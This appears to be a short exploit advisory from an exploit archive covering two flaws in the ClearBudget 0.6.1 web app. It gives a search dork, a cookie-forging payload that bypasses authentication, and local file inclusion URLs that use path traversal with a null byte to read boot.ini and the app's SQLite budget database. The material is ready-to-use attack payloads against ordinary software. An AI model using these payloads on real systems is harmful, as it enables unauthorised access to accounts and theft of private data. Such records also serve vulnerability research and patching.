ClearBudget 0.6.1 Insecure Cookie Handling / LFI Vulnerabilities

2009-02-05T00:00:00
ID 1337DAY-ID-4803
Type zdt
Reporter SirGod
Modified 2009-02-05T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
ClearBudget 0.6.1 Insecure Cookie Handling / LFI Vulnerabilities
================================================================


#############################################################################################

[+] Dork : ClearBudget v0.6.1

[+] Homepage : http://clearbudget.douteaud.com/


[+] Insecure Cookie Handling

    PoC : javascript:document.cookie = "user=true; path=/";

    Live Demo : http://clearbudget.douteaud.com/demo/0-6-1/


[+] Local File Inclusion

   Example : http://127.0.0.1/path/index.php?action=[Local File]%00

   PoC : http://127.0.0.1/path/index.php?action=../../../../boot.ini%00

   PoC 2 : http://127.0.0.1/path/index.php?action=../db/budget.sqlite%00

#############################################################################################



#  0day.today [2018-03-17]  #